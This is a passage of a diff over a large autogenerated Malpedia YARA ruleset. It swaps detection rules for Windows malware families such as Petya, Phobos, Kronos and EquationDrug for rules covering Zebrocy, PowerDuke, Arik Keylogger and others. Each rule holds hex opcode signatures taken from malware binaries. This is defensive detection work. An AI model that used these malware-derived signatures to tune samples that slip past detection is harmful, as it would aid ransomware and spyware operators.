"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kronos_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pslogger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pslogger_auto.yar#L1-L171" license_url = "N/A" - logic_hash = "9add781f31640b82e44b92fb87f47ac9fbcee8b3e1525e4790235c25c58c2848" + logic_hash = "8992cc308f36218b8fec7cd3351151cd41f7bbe9e5dc91614732d13ffd45e45b" score = 75 quality = 75 tags = "FILE" @@ -169525,32 +172376,38 @@ rule MALPEDIA_Win_Kronos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d542450 52 03c6 50 57 ffd3 85c0 } - $sequence_1 = { 813e50450000 7549 57 56 ff75fc e8???????? 8b450c } - $sequence_2 = { e8???????? 33db 6a40 8d4628 53 50 } - $sequence_3 = { e8???????? 85db 0f854fffffff eb1c 8d4dd0 be02000000 e8???????? } - $sequence_4 = { 897804 8930 ff461c 6a00 } - $sequence_5 = { 803d????????01 56 750f 33f6 8d4df0 e8???????? 8bc6 } - $sequence_6 = { eb1d 8b0f e8???????? 8b0f 8b30 6a04 e8???????? } - $sequence_7 = { 0355dc 8b45e8 2b45ec 03ca 3b450c 7356 29450c } - $sequence_8 = { c3 55 8bec 83ec5c 56 8d45a4 50 } - $sequence_9 = { 3b7104 7505 8b06 894104 3b7108 7506 8b5604 } + $sequence_0 = { 7463 488bc8 e8???????? 8bc8 e8???????? 85c0 } + $sequence_1 = { 488d8c2480030000 e8???????? 488d542420 488bcd } + $sequence_2 = { e8???????? e9???????? 4c8bc5 33d2 488bc8 } + $sequence_3 = { b9b80b0000 e8???????? 33d2 41b8b80b0000 488bc8 4c8be0 e8???????? } + $sequence_4 = { 57 4883ec20 488b19 488bf9 483b5908 7418 } + $sequence_5 = { 483bc8 740e 4885c9 7406 ff15???????? } + $sequence_6 = { e9???????? 8d4601 4863e8 488bcd } + $sequence_7 = { e8???????? b9b80b0000 e8???????? 33d2 } + $sequence_8 = { 85c0 0f844c030000 83f826 7603 6a26 58 0fb60c85d64b4200 } + $sequence_9 = { 6a00 53 e8???????? ffb5e0feffff 56 ffb5e4feffff 68???????? } + $sequence_10 = { 8b7c2410 2bd6 83c7fe 668b4702 } + $sequence_11 = { 7504 8816 eb3e c6060d 8b048d88b14200 8854382a } + $sequence_12 = { c1fa06 6bc830 8b049588b14200 8a440828 a848 7404 33c0 } + $sequence_13 = { 894606 8d4594 50 8d4676 } + $sequence_14 = { 6bf830 894df8 6a0a 8b048d88b14200 5b 8b543818 8955ec } + $sequence_15 = { 8b049d88b14200 8945d8 85c0 7553 e8???????? 89049d88b14200 } condition: - 7 of them and filesize <1302528 + 7 of them and filesize <475136 } -rule MALPEDIA_Win_Petya_Auto : FILE +rule MALPEDIA_Win_Zebrocy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d9a77562-a232-5aff-a461-f3720889bdae" + id = "ddee4b03-585f-5184-85a4-c6cc1e810bdc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.petya_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zebrocy_auto.yar#L1-L161" license_url = "N/A" - logic_hash = "e514cd58bfcd6e8ef482bd5780bb94df60b153546d27b2b89cfad52214dcb51a" + logic_hash = "619394d96ac2748c82d29651fdad853561cf847222687873937db9b64b7f21e0" score = 75 quality = 75 tags = "FILE" @@ -169564,32 +172421,38 @@ rule MALPEDIA_Win_Petya_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a03 6800001080 51 ff15???????? 83f8ff } - $sequence_1 = { 57 33ff 3b750c 0f47d9 85db 7410 8b06 } - $sequence_2 = { 0f42f2 6a04 56 e8???????? 8bd8 } - $sequence_3 = { 8bc6 8bca c1e303 0facc110 897c2424 c1e810 } - $sequence_4 = { 8d4e1c e8???????? 8d4e28 e8???????? 8d4e4c e8???????? 837e7400 } - $sequence_5 = { 83e804 4e 75f5 46 3bf2 53 } - $sequence_6 = { 8b4e74 03cb e8???????? 47 83c324 3b7e78 72ed } - $sequence_7 = { 85db 7410 8b06 85c0 7402 ffd0 } - $sequence_8 = { 0fa4df03 c1e818 884c242c 8bc6 } - $sequence_9 = { 8d4e04 e8???????? 8d4e10 e8???????? 8d4e1c } + $sequence_0 = { 014158 11515c e8???????? dc6360 } + $sequence_1 = { 8bc6 33d2 66891478 8bc6 5f c3 8bff } + $sequence_2 = { 0103 83c41c 5b 5e } + $sequence_3 = { 83c438 68581b0000 ff15???????? 83bd00f7ffff08 8b85ecf6ffff 7306 8d85ecf6ffff } + $sequence_4 = { 8b7508 837e0800 7610 8b4608 8d808c994200 fe08 } + $sequence_5 = { 0110 8b7dd4 ba???????? 89470c } + $sequence_6 = { 0103 8b0e ba???????? e8???????? } + $sequence_7 = { 8b441a20 85c9 7f0d 7c05 83f801 7706 } + $sequence_8 = { 0102 8b45d4 89500c 89c1 } + $sequence_9 = { 014150 8b550c 115154 014158 } + $sequence_10 = { 0f8553010000 837de400 7c5d 7f04 85f6 } + $sequence_11 = { 0103 31d2 85ff 8b03 } + $sequence_12 = { 7303 8d45b8 8b4dc8 03c8 8bc6 83fa10 } + $sequence_13 = { 68???????? 6888000800 ff15???????? 8bf0 85f6 } + $sequence_14 = { 0110 5e 5f 5d } + $sequence_15 = { 3bc1 0f87c8090000 ff2485689c4100 33c0 838de8fdffffff } condition: - 7 of them and filesize <229376 + 7 of them and filesize <393216 } -rule MALPEDIA_Win_Equationdrug_Auto : FILE +rule MALPEDIA_Win_Powerduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "37b1b451-51c5-5fbc-9487-21d701b707d2" + id = "6d856194-c9fe-5330-9bd8-d5a96e01d2f2" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.equationdrug_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.powerduke_auto.yar#L1-L113" license_url = "N/A" - logic_hash = "f8f538888e4dbac5fbcd6d58b6a95043a330081a5194049d400ba3c70341afe9" + logic_hash = "8396f645fb90ff46635658086ca415f6d857b1da2dac7ff489b34d4ef5885286" score = 75 quality = 75 tags = "FILE" @@ -169603,19 +172466,19 @@ rule MALPEDIA_Win_Equationdrug_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 5b c21000 8bd0 56 81e2ff0f0000 53 83c704 } - $sequence_1 = { 0f84f4000000 8b7c2414 f7c7ff010000 0f85e4000000 8b4e04 8d442410 50 } - $sequence_2 = { 56 8d4c2418 c644245800 e8???????? 8d4c2414 e8???????? 84c0 } - $sequence_3 = { 84c0 741a 668b4ef8 660fbed0 668b46fa 52 50 } - $sequence_4 = { 89542414 8b542410 0fbfc2 40 0fafc1 3bfb 73c4 } - $sequence_5 = { c644245c00 e8???????? 83c404 89442464 85c0 c644245802 7411 } - $sequence_6 = { e8???????? 85c0 0f864b020000 53 8bcd e8???????? 50 } - $sequence_7 = { 33c0 eb07 8b4708 2bc6 d1f8 33d2 33db } - $sequence_8 = { 8bca b001 83e103 f3a4 5f 5e 5d } - $sequence_9 = { 6685c0 7537 8b442408 3dffff0000 772c c1e009 } + $sequence_0 = { c705????????00000000 6a04 6800300000 ff7518 } + $sequence_1 = { ff75e4 ff75bc ff15???????? 09c0 7473 } + $sequence_2 = { 6a00 ff15???????? 09c0 0f8412010000 8945e4 53 50 } + $sequence_3 = { b801000000 c9 c20c00 55 89e5 81ec080c0000 } + $sequence_4 = { 89f7 31c9 803c0f3a 7409 } + $sequence_5 = { 09c0 7505 b850000000 8945ec c6040e00 } + $sequence_6 = { c70000000000 837d2000 740f 8b4520 } + $sequence_7 = { c20400 55 89e5 56 57 8b750c } + $sequence_8 = { 0f8493000000 c745f901000000 89c3 be???????? } + $sequence_9 = { 6a00 57 ff15???????? 09c0 } condition: - 7 of them and filesize <449536 + 7 of them and filesize <57344 } rule MALPEDIA_Win_Sidetwist_Auto : FILE { @@ -169656,18 +172519,18 @@ rule MALPEDIA_Win_Sidetwist_Auto : FILE condition: 7 of them and filesize <2002944 } -rule MALPEDIA_Win_Nimgrabber_Auto : FILE +rule MALPEDIA_Win_Nosu_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3ff9ecdf-434a-5531-ae47-14063d732bcc" + id = "d0493836-076e-53ac-80d2-093749a42975" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nimgrabber_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nosu_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "d88020b2287429253ba602c12d16ae36bc236c828c7e32d50b3c884fb53a1e20" + logic_hash = "8ab8c6afe29bf167cf16b426bd8eca0dcd4e462cdef53cd757a920fd1f6ec318" score = 75 quality = 75 tags = "FILE" @@ -169681,32 +172544,32 @@ rule MALPEDIA_Win_Nimgrabber_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f8fa7000000 c7819814000000400000 b800400000 c744240c04000000 c744240800300000 39c7 0f8fd0010000 } - $sequence_1 = { 8b842490000000 83c004 89442430 0f80de2e0000 8b8424d8000000 8b00 39442430 } - $sequence_2 = { c705????????b83b4800 c705????????20000000 c705????????02000000 c705????????00254800 668915???????? c605????????01 c705????????00000000 } - $sequence_3 = { 8d4710 8d5f08 be???????? b90b000000 c743042b000000 c747082b000000 89c7 } - $sequence_4 = { c1f80c 89442418 89e8 0fb6c0 8d0483 8944241c 8b8084100000 } - $sequence_5 = { 7f0d b9???????? e8???????? 8b4514 83e801 0f8067160000 894514 } - $sequence_6 = { c70424???????? 894c2474 89542404 e8???????? 8b4c2474 31c0 894b04 } - $sequence_7 = { 8b6f04 81fd0000003f 7e28 c704240000003f 89fa 89f1 e8???????? } - $sequence_8 = { 89f9 e8???????? 8b4c2454 89da e8???????? 8b07 } - $sequence_9 = { 740a 8b0b 85c9 0f88a6020000 e8???????? 31ed 89442430 } + $sequence_0 = { 50 8d4730 50 ff15???????? 03c0 8d5730 50 } + $sequence_1 = { 399628040000 7438 399648010000 7430 3996b8020000 7428 8b8e48060000 } + $sequence_2 = { 8bcf 8938 e8???????? 894500 85c0 } + $sequence_3 = { e8???????? 59 85c0 7444 8b7c2410 bd???????? 55 } + $sequence_4 = { 0f45cf 03ce 84c0 8b4508 51 ff742420 0f45d7 } + $sequence_5 = { 7462 803b22 0f85d4010000 8d470c 50 8d5708 8d4c2418 } + $sequence_6 = { 53 50 53 a5 8d942440080000 53 53 } + $sequence_7 = { 8b442434 59 c60004 8b442430 c640010e } + $sequence_8 = { 50 8d8e280a0000 e8???????? 59 8d442468 50 8d442424 } + $sequence_9 = { 8d96a8000000 8d4e48 e8???????? 59 59 84c0 742c } condition: - 7 of them and filesize <1238016 + 7 of them and filesize <513024 } -rule MALPEDIA_Win_Spectre_Auto : FILE +rule MALPEDIA_Win_Httpsuploader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "af0ed3ea-7150-5006-a1e4-f1f71a7eae7a" + id = "be17d448-1d90-5f75-8f13-d63b39944dc3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spectre_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.httpsuploader_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "168b0e3a3116ff3325056de927c137c412a6159d98ef56a6628c736a2a7417ad" + logic_hash = "5be7e6e5938fcb4fa9787510fb0867a1f442345e4d8453db75c177a24413afa4" score = 75 quality = 75 tags = "FILE" @@ -169720,32 +172583,32 @@ rule MALPEDIA_Win_Spectre_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ebe3 83c8ff 5d 5b 59 59 c3 } - $sequence_1 = { 68???????? ff5604 e9???????? 807c242000 0f8414010000 6a02 } - $sequence_2 = { 51 e8???????? 59 59 8b8424ec000000 895c2470 896c2474 } - $sequence_3 = { 50 e8???????? 83c40c 50 8d8424a0000000 50 e8???????? } - $sequence_4 = { 83e801 7440 83e801 742c 83e801 7418 } - $sequence_5 = { 894554 53 8d4dc3 e8???????? 8bc8 e8???????? 50 } - $sequence_6 = { 83f81b 0f8ee3020000 83f81f 0f8eb3020000 83f821 0f8e06020000 83f822 } - $sequence_7 = { 8b4704 8bcd c6400c01 8b4704 8b4004 c6400c00 8b4704 } - $sequence_8 = { 51 8d8c2440010000 e8???????? 8d8c24d8000000 e8???????? 8d4c2448 e8???????? } - $sequence_9 = { c68424c400000000 ff15???????? 59 59 85c0 743d 6a01 } + $sequence_0 = { 33ff 33d2 41b806020000 6689bc2470020000 e8???????? 488d4c2451 33d2 } + $sequence_1 = { 33d2 33c9 897c2428 48895c2420 ff15???????? eb3b 488d0dc3bd0000 } + $sequence_2 = { 4883ec20 488bfa 488bd9 488d0501700000 488981a0000000 83611000 } + $sequence_3 = { 4c8bc0 418bd4 e8???????? 488d8dd0000000 ff15???????? } + $sequence_4 = { 488d0d6c280000 4533c9 ba00000040 4489442420 ff15???????? } + $sequence_5 = { 4c8d25cf7d0000 f0ff09 7511 488b8eb8000000 493bcc } + $sequence_6 = { 488d0543b50000 eb04 4883c014 4883c428 c3 4053 } + $sequence_7 = { 488d158e380000 488bc8 ff15???????? 4885c0 0f847a010000 } + $sequence_8 = { 81fa01010000 7d13 4863ca 8a44191c 4288840170fa0000 } + $sequence_9 = { 745e 6666660f1f840000000000 488b0d???????? 488d542440 4533c9 4533c0 ff15???????? } condition: - 7 of them and filesize <990208 + 7 of them and filesize <190464 } -rule MALPEDIA_Win_Phobos_Auto : FILE +rule MALPEDIA_Win_Unidentified_087_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b3fdfb89-c1ef-5439-9836-c8e32a8398db" + id = "40b9cd18-d110-5435-969b-5dfac9c340c4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.phobos_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_087_auto.yar#L1-L174" license_url = "N/A" - logic_hash = "2c179588b445524a4924d6ad3214734291e040f7e6e3be29f272840c2a179aff" + logic_hash = "110739d44f9e53e4e50b40a1961bcb5043ade07265d58318b1d26ddc3eb75b3c" score = 75 quality = 75 tags = "FILE" @@ -169759,32 +172622,38 @@ rule MALPEDIA_Win_Phobos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75fc e8???????? 59 85c0 0f845c010000 395df8 0f8453010000 } - $sequence_1 = { 59 8d4c0002 8bc7 2bc6 03c1 894ddc 897dd0 } - $sequence_2 = { 8d5c3801 e8???????? 59 8945fc 8975e4 ff15???????? 6a40 } - $sequence_3 = { 752e 6683f930 7409 c7450c0a000000 } - $sequence_4 = { 53 56 c745a044000000 ff15???????? 8945fc 3bc6 } - $sequence_5 = { 8bf8 57 897de0 e8???????? 83c40c 680a020000 8d5c3801 } - $sequence_6 = { 8d45f4 50 53 ff15???????? 56 8b35???????? ffd6 } - $sequence_7 = { 8bf3 2b7010 e8???????? f6472801 8d440006 59 8945fc } - $sequence_8 = { 7423 a900040000 7518 8b06 ff750c 8b00 ff7020 } - $sequence_9 = { 83c602 0fb716 83c702 6685d2 75e0 668b06 663b07 } + $sequence_0 = { c7453802000000 ff15???????? 83f801 7409 83f80d 0f8581000000 } + $sequence_1 = { 4c8d9c2480020000 498b5b28 498b7330 498be3 415c } + $sequence_2 = { 4d8bcf 4533c0 488d542428 488d4c2450 e8???????? 488d5580 488d4c2450 } + $sequence_3 = { 895c2420 48895908 4c8bf1 488948c8 } + $sequence_4 = { 40b601 488bcb ff15???????? 400fb6c6 } + $sequence_5 = { ff15???????? 483905???????? 752b 8b442460 3905???????? 751f } + $sequence_6 = { eb09 488b05???????? 33d2 8d3c10 488b4c2450 48634104 f644046006 } + $sequence_7 = { 488d68a1 4881ece0000000 48c745c7feffffff 48895810 48897818 488b05???????? 4833c4 } + $sequence_8 = { c6864b01000043 c7466870040210 6a0d e8???????? 59 8365fc00 ff7668 } + $sequence_9 = { 89430c 8d4310 8d89a4080210 5a 668b31 } + $sequence_10 = { 6a10 57 ff15???????? 6a00 6a00 6a00 8d8584feffff } + $sequence_11 = { c745e40f000000 895de0 885dd0 8d45d0 50 } + $sequence_12 = { ff15???????? 50 8dbdf8feffff e8???????? 83c404 5f } + $sequence_13 = { c705????????25ca0010 8935???????? a3???????? ff15???????? a3???????? 83f8ff } + $sequence_14 = { 7461 8d0cbd602c0210 8901 8305????????20 8b11 } + $sequence_15 = { 85c9 7410 8b14b8 8911 8b0d???????? } condition: - 7 of them and filesize <139264 + 7 of them and filesize <462848 } -rule MALPEDIA_Win_Glassrat_Auto : FILE +rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "daeaa019-8217-55aa-beac-5fb62572b79c" + id = "85657a12-5353-59c6-96c2-3cad36ac8818" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.glassrat_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.arik_keylogger_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "c91259f84ec94eec4bc87c666b3c91ba45af3572c135cc4f200070d560141e5d" + logic_hash = "f00c46b1c19068a9b1d9eb23a1cbe0ffd294a87bebb3732b435039b4cebfac37" score = 75 quality = 75 tags = "FILE" @@ -169798,32 +172667,32 @@ rule MALPEDIA_Win_Glassrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d542438 83c9ff 33c0 f2ae f7d1 2bf9 8bc1 } - $sequence_1 = { ff15???????? 33c0 8b5504 8944241d 8d4c241c } - $sequence_2 = { 747a 3bfe 7476 56 56 56 53 } - $sequence_3 = { 895db8 895dbc ff15???????? 85c0 0f84bb000000 } - $sequence_4 = { 3bc8 b802000000 0f85b4000000 33d2 b909020000 52 83ec10 } - $sequence_5 = { 6a04 51 52 8844243b } - $sequence_6 = { 8b460c 53 53 57 50 } - $sequence_7 = { 8bce ff12 57 ff15???????? 8d4c2420 } - $sequence_8 = { 89442418 ff15???????? 8b4d04 8b1d???????? } - $sequence_9 = { 89442408 89542404 8a15???????? 33c0 } + $sequence_0 = { 8b45fc f7402801000000 755a 8b45fc 8b55fc 8b12 ff927c040000 } + $sequence_1 = { dd5df8 e8???????? ba???????? 8d45c0 e8???????? 58 85c0 } + $sequence_2 = { 8b804c010000 e8???????? e8???????? 84c0 7424 8b45f8 8b804c010000 } + $sequence_3 = { b003 e9???????? b004 e9???????? b005 e9???????? b006 } + $sequence_4 = { e8???????? 8b45ec 8908 8b45f0 8b08 034df4 7105 } + $sequence_5 = { e8???????? 50 85c0 0f8528010000 8b45b8 e8???????? c745b400000000 } + $sequence_6 = { eb16 8b45fc 8b4004 0d00001000 0d00002000 8b55fc 894204 } + $sequence_7 = { f3a5 8b45f4 83b8d002000000 7432 8b45f8 50 8b4518 } + $sequence_8 = { 8b45f4 e8???????? 8b45f4 83c024 8a4d08 8d55ec e8???????? } + $sequence_9 = { 8d45d4 e8???????? c745d400000000 8d45d0 e8???????? c745d000000000 8b4614 } condition: - 7 of them and filesize <81920 + 7 of them and filesize <4947968 } -rule MALPEDIA_Win_Greenshaitan_Auto : FILE +rule MALPEDIA_Win_Mydogs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d06953fb-38e3-55db-9793-3faef3649e6a" + id = "8e0c4ca1-c33b-55e0-bdee-122873680dc3" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.greenshaitan_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mydogs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mydogs_auto.yar#L1-L130" license_url = "N/A" - logic_hash = "67bf6d74e4d0fa44058834ba5470ffb949ca80488520bfdf122c691ce2d70d18" + logic_hash = "64d7e86bc2c7d2208d4e1b71baa972c2ebb11908509ae447cb6fe3a57912500e" score = 75 quality = 75 tags = "FILE" @@ -169837,32 +172706,32 @@ rule MALPEDIA_Win_Greenshaitan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b460c 8d542434 52 50 } - $sequence_1 = { 6a00 51 50 b940000000 e8???????? 8bf0 eb02 } - $sequence_2 = { 81ce00ffffff 46 8a1c0e 881c0f 88040e 8d4201 99 } - $sequence_3 = { 8b442444 8b4c2440 8b7c243c 50 51 8d542418 52 } - $sequence_4 = { e8???????? 85ed 740c 8b4500 eb09 8b4500 8bc8 } - $sequence_5 = { 51 ff15???????? 8b8c240c200000 5e 5d } - $sequence_6 = { 0fb69b685b6e00 8819 0fb6d2 8bda c1eb04 c1e004 0bd8 } - $sequence_7 = { 8bc8 ebe1 33c0 397814 770e 85ed 7405 } - $sequence_8 = { 33f6 8bc5 99 6a00 52 c644244400 50 } - $sequence_9 = { 720d 8b542434 52 e8???????? 83c404 c784248c000000ffffffff 897c2448 } + $sequence_0 = { 3db7000000 0f8444010000 68???????? 6804010000 68???????? e8???????? } + $sequence_1 = { 884df3 c1fa18 8b5364 8bc2 8bce 0facc108 c1f808 } + $sequence_2 = { 5d e9???????? 6a18 68???????? e8???????? 8b4508 8bd8 } + $sequence_3 = { 894e64 8b4dec 894650 894658 894660 8b45ee 8d49c4 } + $sequence_4 = { 50 ffb5e4eeffff ffb5f8eeffff ff15???????? 85c0 7515 5f } + $sequence_5 = { 8bf9 53 895ddc 897de0 e8???????? } + $sequence_6 = { 8b4dfc 33cd e8???????? 8be5 5d c3 8d85f4eeffff } + $sequence_7 = { 50 8bcf c645ff4b e8???????? 6a01 8d450b 50 } + $sequence_8 = { 1ddeb19d01 50 51 89530c e8???????? 894310 } + $sequence_9 = { e8???????? 50 6800080000 53 89442434 e8???????? 83c414 } condition: - 7 of them and filesize <253952 + 7 of them and filesize <313344 } -rule MALPEDIA_Win_Unidentified_031_Auto : FILE +rule MALPEDIA_Win_Mm_Core_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f9c620fb-a7af-59b3-88ea-9e26f2264efe" + id = "d45aa5c3-0724-55a7-87e0-2c03f652362f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_031_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mm_core_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "135d93e7e92e738a5df3c00f6ebb76c4de980af7c891f431b4f3045d05f7757e" + logic_hash = "3ca1e6eabacd07d91480b5599e1196a1b257af6133657fffc185261c4367958e" score = 75 quality = 75 tags = "FILE" @@ -169876,34 +172745,34 @@ rule MALPEDIA_Win_Unidentified_031_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f84a6010000 3bfd 0f849e010000 50 e8???????? 6a00 6a01 } - $sequence_1 = { 891f 8dbe9c000000 8b07 3bc3 7411 50 53 } - $sequence_2 = { ffd6 8d4dc8 ffd6 8d4db0 ffd6 8d4d9c ffd6 } - $sequence_3 = { c78504fdffff08800000 c7853cfeffff15000000 c78534feffff02000000 ff15???????? c785ecfcffff3c624000 c785e4fcffff08800000 c785fcfdffff18000000 } - $sequence_4 = { e8???????? 8945a0 8d7cbdd0 ff37 50 8bce e8???????? } - $sequence_5 = { 895508 0f8203ffffff 83c8ff 5f 5e 5b 5d } - $sequence_6 = { 51 52 e8???????? 8d9564ffffff 8d4dc8 89856cffffff } - $sequence_7 = { 57 50 e8???????? 3bc3 740e 895e7c 3dc3040000 } - $sequence_8 = { 8b3f eb03 8b7de0 c7467c01000000 8b4668 ff75e8 57 } - $sequence_9 = { 68???????? 85c0 0f9fc3 f7db ff15???????? 0fbfc0 8b55cc } + $sequence_0 = { 7458 57 8b7c240c 85ff 744e 6a40 6800300000 } + $sequence_1 = { c1f805 8bf7 83e61f c1e606 03348540400110 c745e401000000 } + $sequence_2 = { 8b45fc ff34c5e41c0110 53 57 e8???????? 83c40c 85c0 } + $sequence_3 = { 85f6 0f848d000000 8b0e 85c9 7442 8b5608 } + $sequence_4 = { 8b442424 8b4c242c 8938 8931 } + $sequence_5 = { 8955d4 8b45d4 8b4814 894ddc } + $sequence_6 = { 8d4c244c 51 55 55 68???????? 68???????? } + $sequence_7 = { 57 52 89842480000000 898c2484000000 89bc2488000000 e8???????? 83c40c } + $sequence_8 = { e8???????? bb???????? 8d742434 e8???????? 8d9c24a8050000 8d742428 e8???????? } + $sequence_9 = { 8b4dc4 0fb611 0355fc 8955fc 8b45c4 } condition: - 7 of them and filesize <1998848 + 7 of them and filesize <319488 } -rule MALPEDIA_Win_Retefe_Auto : FILE +rule MALPEDIA_Win_Tflower_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f3caa6e6-3618-52a1-825b-c9f70c1ac6ab" + id = "b4660b68-51d0-51ac-bbdd-acf4449bc6d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.retefe_auto.yar#L1-L263" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tflower_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "60c0df86aaa8e365109479b1ca3f3fca53ccf95fd2fbd33ae20876e0704e51b2" + logic_hash = "82eb88790bbfb711d9ea01573d045bd4c38f5ceb308c5ccacf5ea018abeab10b" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -169915,51 +172784,38 @@ rule MALPEDIA_Win_Retefe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 6a01 ff15???????? 8bf0 85f6 7410 6a09 } - $sequence_1 = { 51 8bf8 ffd6 85c0 } - $sequence_2 = { 68f5000000 50 ff15???????? b801000000 } - $sequence_3 = { e8???????? 6a08 e8???????? 894604 } - $sequence_4 = { 6a24 6a5a 6a24 e8???????? 81c494000000 } - $sequence_5 = { 8b4e04 8901 8b4e04 33c0 83c404 394104 } - $sequence_6 = { 6a0e 6aeb 6a1a 6a96 6a0d } - $sequence_7 = { 894604 83c404 8bc6 e8???????? } - $sequence_8 = { 51 ff15???????? 8b95d8efffff 50 52 ff15???????? 50 } - $sequence_9 = { 52 e8???????? 8b4e04 8901 } - $sequence_10 = { 6ad1 6a1a 6a55 6ad7 6ad1 } - $sequence_11 = { 880c10 8b4e04 40 3b4104 } - $sequence_12 = { 50 e8???????? 83c408 e8???????? 99 b960f59000 } - $sequence_13 = { 8bec 837d0c00 7409 b80b000280 } - $sequence_14 = { 56 33f6 8b86a0bf4200 85c0 740e } 